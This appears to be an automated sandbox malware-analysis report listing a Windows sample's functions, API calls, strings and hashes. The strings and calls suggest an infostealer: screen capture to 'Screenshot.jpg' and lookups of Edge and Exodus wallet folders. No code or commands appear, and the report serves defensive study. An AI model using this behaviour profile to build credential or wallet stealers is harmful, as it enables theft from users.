Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFileFromImageSave
String ID: \Screenshot.jpg
API String ID: 2335731563-675533427
Opcode ID: 7f7bc839ba2aaeb7887f169590bb99545f6d21552d0e7b74b191fd9de547f69f
Instruction ID: d04332063d67c9095446881174ff85fb0b55386c27f887e66e28f6695062a00f
Opcode Fuzzy Hash: 7f7bc839ba2aaeb7887f169590bb99545f6d21552d0e7b74b191fd9de547f69f
Instruction Fuzzy Hash: 84213932B14B5596EB00EB61D8542AC77B5FB48F88F84803ACE1D53798DFB8D545C3A0

Function 00007FF7F12ED880 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 40libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F12ED430: GetModuleHandleA.KERNEL32 ref: 00007FF7F12ED476
Part of subcall function 00007FF7F12ED430: GetProcAddress.KERNEL32 ref: 00007FF7F12ED486

Part of subcall function 00007FF7F12B3C80: GetModuleHandleA.KERNEL32(?,?,00000002,00007FF7F12ED8CB,?,?,?,?,?,?,00007FF7F12B3E8B), ref: 00007FF7F12B3C94

GetProcAddress.KERNEL32(?,?,?,?,?,?,00007FF7F12B3E8B), ref: 00007FF7F12ED8E1

Strings

secur32.dll, xrefs: 00007FF7F12ED8B4
security.dll, xrefs: 00007FF7F12ED8BB
InitSecurityInterfaceA, xrefs: 00007FF7F12ED8D7

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: InitSecurityInterfaceA$secur32.dll$security.dll
API String ID: 1646373207-3788156360
Opcode ID: d9a435e6787294436ad44784e22c1c43c00c0275dd53161b871b8b12983e3b79
Instruction ID: 19e448f3f1018ef6023b41545091f346c0358139cb51f9449c00c925159e3a52
Opcode Fuzzy Hash: d9a435e6787294436ad44784e22c1c43c00c0275dd53161b871b8b12983e3b79
Instruction Fuzzy Hash: A2014820B19B4682EF44EB59A8A1765A3A1BF48340FC8503DDA5D837D5FFBCE50887A0

Function 00007FF7F1317818 Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F1317803), ref: 00007FF7F1317934
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F1317803), ref: 00007FF7F13179BF

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 927588212c4f7140c905eb9cffc910b3153872b2b5131b69c7bb0ca4a9e0dee2
Instruction ID: 9212c0bf63c025c40adc6fb3b55c7402d8c00f99b81db4e71a30bc30c7938560
Opcode Fuzzy Hash: 927588212c4f7140c905eb9cffc910b3153872b2b5131b69c7bb0ca4a9e0dee2
Instruction Fuzzy Hash: 5F910722F0865186F750AF6584406BDABA0BF047A8F99413DDE6E377C6CFB8E446C360

Function 00007FF7F131CF40 Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF7F131D030
_get_daylight.LIBCMT ref: 00007FF7F131D041
_get_daylight.LIBCMT ref: 00007FF7F131D052
_isindst.LIBCMT ref: 00007FF7F131D11D

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 872872aef99863ee478c3de1efa29fdc86b53772d35afb18ae57b287bcbb5de2
Instruction ID: 3f452028464ff8cb113070e3d8589ff25680e83ee68a18845d62b1202231233c
Opcode Fuzzy Hash: 872872aef99863ee478c3de1efa29fdc86b53772d35afb18ae57b287bcbb5de2
Instruction Fuzzy Hash: 74512672F041128BEB18FB24D9956BCA7A1BF01378F91013DDD2E62AD5DB7CA402C750

Function 00007FF7F1303674 Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F130330C), ref: 00007FF7F13036A7
GetFileInformationByHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F130330C), ref: 00007FF7F1303709
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7F130330C), ref: 00007FF7F130379B
PeekNamedPipe.KERNEL32 ref: 00007FF7F13037E7

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 299048db424302d61068b2727f12977d3716de6ffb6747d422c7894533d9b74c
Instruction ID: 8ca18c13d0c948701f387a368db1a96eb58505f471ae3f68feb0584ed80e72cb
Opcode Fuzzy Hash: 299048db424302d61068b2727f12977d3716de6ffb6747d422c7894533d9b74c
Instruction Fuzzy Hash: EC418B66E086418AFB10EFB1D4513BDA7E1BF48B5CF504539DE2D47689DFB8E48183A0

Function 00007FF7F13034D4 Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F1303504
CreateFileW.KERNELBASE ref: 00007FF7F1303554
CloseHandle.KERNEL32 ref: 00007FF7F130359B

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: 5f94081f82086c0d0288e87be23f1403e51a12f95bff66429f7862373c8c3ded
Instruction ID: 2b10c9b4eb4d36b67c0b4622f453c67c844a9e32f2e10d749a0113d9c7544bb5
Opcode Fuzzy Hash: 5f94081f82086c0d0288e87be23f1403e51a12f95bff66429f7862373c8c3ded
Instruction Fuzzy Hash: 11419062D18B818BE3549F309540369A3A0FF99758F509339EBAC03AD5EF7CE1A18790

Function 00007FF7F132D5F4 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

GdiplusStartup.GDIPLUS ref: 00007FF7F132D62B
GetSystemMetrics.USER32 ref: 00007FF7F132D633
GetSystemMetrics.USER32 ref: 00007FF7F132D63D
GdiplusShutdown.GDIPLUS ref: 00007FF7F132D691

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: GdiplusMetricsSystem$ShutdownStartup
String ID:
API String ID: 1537832493-0
Opcode ID: d3adff0ba0cd22d04c99bd6e35e9e822ec9d3de7431347d6f95e856eb4d8d5e8
Instruction ID: 842efe6030c522f160d4165c552bd36676032705ff450c9205033e39e330f1c7
Opcode Fuzzy Hash: d3adff0ba0cd22d04c99bd6e35e9e822ec9d3de7431347d6f95e856eb4d8d5e8
Instruction Fuzzy Hash: D8219A33B14A118AE710AF70D8443AD67B0FB48BADF94123ADE1D63A99DF78D4858790

Function 00007FF7F132E07C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24fileCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 00007FF7F132E0B1
CopyFileW.KERNELBASE ref: 00007FF7F132E0C2

Strings

%s\%s, xrefs: 00007FF7F132E0A5

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CopyFilewsprintf
String ID: %s\%s
API String ID: 463280863-4073750446
Opcode ID: e63c7138dbdfefb25e0694bb4cce5930fd43d03588db8c741460d8dda7bce9d6
Instruction ID: e2199b060d038f8b55f1b1d7c817f83c5b8b81914e2b2b46e27d43ebed27608c
Opcode Fuzzy Hash: e63c7138dbdfefb25e0694bb4cce5930fd43d03588db8c741460d8dda7bce9d6
Instruction Fuzzy Hash: 8FF0A71271868692EB20AB11F9543AA9361FF48BC0FC98035DA6C47699DF7CD244C750

Function 00007FF7F12FA134 Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F12FA33C: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF7F12FA350

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF7F12FA158
__scrt_release_startup_lock.LIBCMT ref: 00007FF7F12FA1C6
__scrt_get_show_window_mode.LIBCMT ref: 00007FF7F12FA219

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
String ID:
API String ID: 3251591375-0
Opcode ID: 8734a954005d36adcbd41b79a72bffaa0f249be3d1877407a8cfa64c6e33a4c8
Instruction ID: 550807f5ead9ccbfc94e6c8177097ca5cec18372a07aa605494c78c0260c0607
Opcode Fuzzy Hash: 8734a954005d36adcbd41b79a72bffaa0f249be3d1877407a8cfa64c6e33a4c8
Instruction Fuzzy Hash: D9315C25F0824386FB14B7A494223B99291AF45784FC54439E53D872D3DFEDB40882F0

Function 00007FF7F12B8980 Relevance: 4.5, APIs: 3, Instructions: 37networkCOMMON

Download Yara Rule

APIs

SleepEx.KERNELBASE ref: 00007FF7F12B89A4
getsockopt.WS2_32 ref: 00007FF7F12B89C7
WSAGetLastError.WS2_32 ref: 00007FF7F12B89D1

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorLastSleepgetsockopt
String ID:
API String ID: 3033474312-0
Opcode ID: 187af71301877475cb9d0191c8dae17f6879211908ed9d5fa7c06ead14f62fff
Instruction ID: 827a0f2ddf6b1eec146ff30d518ea42512283b39c4d9e90094eb7ece31f1aff7
Opcode Fuzzy Hash: 187af71301877475cb9d0191c8dae17f6879211908ed9d5fa7c06ead14f62fff
Instruction Fuzzy Hash: 64018432708A4283EB50EF5AE54423AE7A0EF49784F644035DAAD83BD4DFBDE448DB54

Function 00007FF7F1296150 Relevance: 4.5, APIs: 3, Instructions: 26COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32 ref: 00007FF7F129615B
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF7F1296181
ReleaseSRWLockExclusive.KERNEL32 ref: 00007FF7F1296195

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ExclusiveLock$Release$Acquire
String ID:
API String ID: 1021914862-0
Opcode ID: 5a3a22ac07b609585bd76cc359718e12eeed872fc36120eadf7476f6bb25145c
Instruction ID: 103dc9dc562a9a75b0ea44da84fd88b3ff2861716d12e1fe65ac0637d78b6d23
Opcode Fuzzy Hash: 5a3a22ac07b609585bd76cc359718e12eeed872fc36120eadf7476f6bb25145c
Instruction Fuzzy Hash: 58F01720F18807D6EB14FB69DC96575A291BF94714FC00039D42EC22E4EFECE549E3A0

Function 00007FF7F132E188 Relevance: 4.5, APIs: 3, Instructions: 22fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007FF7F132E1C4
GetLastError.KERNEL32 ref: 00007FF7F132E1D0
CloseHandle.KERNELBASE ref: 00007FF7F132E1DD

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: CloseCreateErrorFileHandleLast
String ID:
API String ID: 2528220319-0
Opcode ID: da8c1e7c2bedeec4287d7efc48ed0a0beeb5db5798330487481e790f59f59b7a
Instruction ID: 52f99148aba7e0fb4742b5c662ae610a773bf29d3c71cf3574555e81468b8336
Opcode Fuzzy Hash: da8c1e7c2bedeec4287d7efc48ed0a0beeb5db5798330487481e790f59f59b7a
Instruction Fuzzy Hash: 61F0FE7AA1560587EB10AF10C54D36D36A0AB45B34FA0032CD7390B3E0CFBE654AA7E4

Function 00007FF7F1314108 Relevance: 4.5, APIs: 3, Instructions: 14COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7F1314104), ref: 00007FF7F1314119
TerminateProcess.KERNEL32(?,?,?,00007FF7F1314104), ref: 00007FF7F1314124
ExitProcess.KERNEL32 ref: 00007FF7F1314133

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: e61241e97333a41a25bdf127c6d78ffe4b4afa0527e86134b17f50a5464aaad9
Instruction ID: a11429d9bbf725c3188e30801a35121a24bb543b6923d150af63e7cf6bae88c6
Opcode Fuzzy Hash: e61241e97333a41a25bdf127c6d78ffe4b4afa0527e86134b17f50a5464aaad9
Instruction Fuzzy Hash: 16D05E10F0820A83EB143B705C4507982116F68761F82143CD82B523D3DFACF40942E0

Function 00007FF7F1332B70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1330C3C: SHGetFolderPathW.SHELL32 ref: 00007FF7F1330C6C

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1332D5B

Strings

Edge, xrefs: 00007FF7F1332CE4

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: FolderPath_invalid_parameter_noinfo_noreturn
String ID: Edge
API String ID: 2457504600-3576986712
Opcode ID: 6af5376d8284666509a39ac250658d98b0049f0fa58c2742334cf2119df5c520
Instruction ID: 422a302bf6fd2beb9c00d23d419060b2e218460794d53f8f66328be298725c9f
Opcode Fuzzy Hash: 6af5376d8284666509a39ac250658d98b0049f0fa58c2742334cf2119df5c520
Instruction Fuzzy Hash: C351D062F14B469AE700EBB4D4401ECA372EF95388F905236EA5C6299ADF78E180C3D0

Function 00007FF7F1331110 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1330628: SHGetFolderPathW.SHELL32 ref: 00007FF7F1330658

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7F1331298

Strings

Exodus, xrefs: 00007FF7F133121D

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: FolderPath_invalid_parameter_noinfo_noreturn
String ID: Exodus
API String ID: 2457504600-2418718958
Opcode ID: 4c8f0d2490d29a433f996ffc5986f4a692f122b01e6baf9c58cd39e8dc5808cf
Instruction ID: 1c5dea5c757f340ad5d1175824c4c849a5cd81e27dca2f0989d9feafd4d80d6c
Opcode Fuzzy Hash: 4c8f0d2490d29a433f996ffc5986f4a692f122b01e6baf9c58cd39e8dc5808cf
Instruction Fuzzy Hash: 3F41A172F14B469AE700EFB5D4401ECA371EF95348F805236EA6C53A99DF78E650C394

Function 00007FF7F130A774 Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F130A7B8
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F130A8AF

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 226baa4884bd8ac8757a79bb190ac68c3425e7d02ee30ef96c26bf23a7950968
Instruction ID: cb1d0e82774d73f825a298516bc01eef1e62cb852e959d3b6fcab872ff2ce2f5
Opcode Fuzzy Hash: 226baa4884bd8ac8757a79bb190ac68c3425e7d02ee30ef96c26bf23a7950968
Instruction Fuzzy Hash: 2751D862B0924547E724AE66A4006BAF7D1AF44BACF958738DD7D077C5CFBCD40186A0

Function 00007FF7F13172D0 Relevance: 3.1, APIs: 2, Instructions: 74fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE ref: 00007FF7F1317383
GetLastError.KERNEL32 ref: 00007FF7F131739F

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID:
API String ID: 442123175-0
Opcode ID: a59a4deeb7d1583818771ec43f3b3d65bc0ba5a8caf124717a6e54d4c4c0e0da
Instruction ID: 1f776432e102c1c7a59c317af647f602d0aa9c19be2464d5a445bc6b16bae685
Opcode Fuzzy Hash: a59a4deeb7d1583818771ec43f3b3d65bc0ba5a8caf124717a6e54d4c4c0e0da
Instruction Fuzzy Hash: 6D31F432B08B8187D710AF15E4406A8B7A0FB08780F894435DE5E83795DF7CE411C790

Function 00007FF7F12FA050 Relevance: 3.1, APIs: 2, Instructions: 55COMMON

Download Yara Rule

APIs

_set_fmode.LIBCMT ref: 00007FF7F12FA067
_RTC_Initialize.LIBCMT ref: 00007FF7F12FA088

Part of subcall function 00007FF7F13136EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F131371E

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: Initialize_invalid_parameter_noinfo_set_fmode
String ID:
API String ID: 3548387204-0
Opcode ID: 52c5d3622f53ab46860b0e1a3c6061f5303ee6fca459e950fe332ed877b63895
Instruction ID: f2af780275b9aeca2b8eb402164455cbe8fbac3e511cb0188f0c421b99e4ca93
Opcode Fuzzy Hash: 52c5d3622f53ab46860b0e1a3c6061f5303ee6fca459e950fe332ed877b63895
Instruction Fuzzy Hash: B0119A10F0820302FB1877F0A5662B9D2916F55360FC60439E57DEA6C3EFACB98846F2

Function 00007FF7F1312CB4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,00000004,00007FF7F1312E4D), ref: 00007FF7F1312D00
GetLastError.KERNEL32(?,?,?,?,00000004,00007FF7F1312E4D), ref: 00007FF7F1312D0A

Memory Dump Source

Source File: 00000000.00000002.2327803560.00007FF7F1281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F1280000, based on PE: true

Associated: 00000000.00000002.2327780129.00007FF7F1280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327871432.00007FF7F1337000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327902669.00007FF7F136C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2327926165.00007FF7F1371000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f1280000_CwQQqCmqkY.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5e790448ec61486aca34e6adc902a885d577137937db7756082ab36af6fd54a7
Instruction ID: 5563a0d3c470b842454e9f10f52d3971378ca37112806ee36fca9f843c696d59
Opcode Fuzzy Hash: 5e790448ec61486aca34e6adc902a885d577137937db7756082ab36af6fd54a7
Instruction Fuzzy Hash: 5911C462A08A8182DB10AB25E804069E761AF45BF4FA44339EE7D1B7D9CFBCD0508790

Function 00007FF7F1322D4C Relevance: 3.0, APIs: 2, Instructions: 46COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF7F1313902), ref: 00007FF7F1322D60
FreeEnvironmentStringsW.KERNEL32(?,?,00000000,00007FF7F1313902), ref: 00007FF7F1322DCA

Memory Dump Source

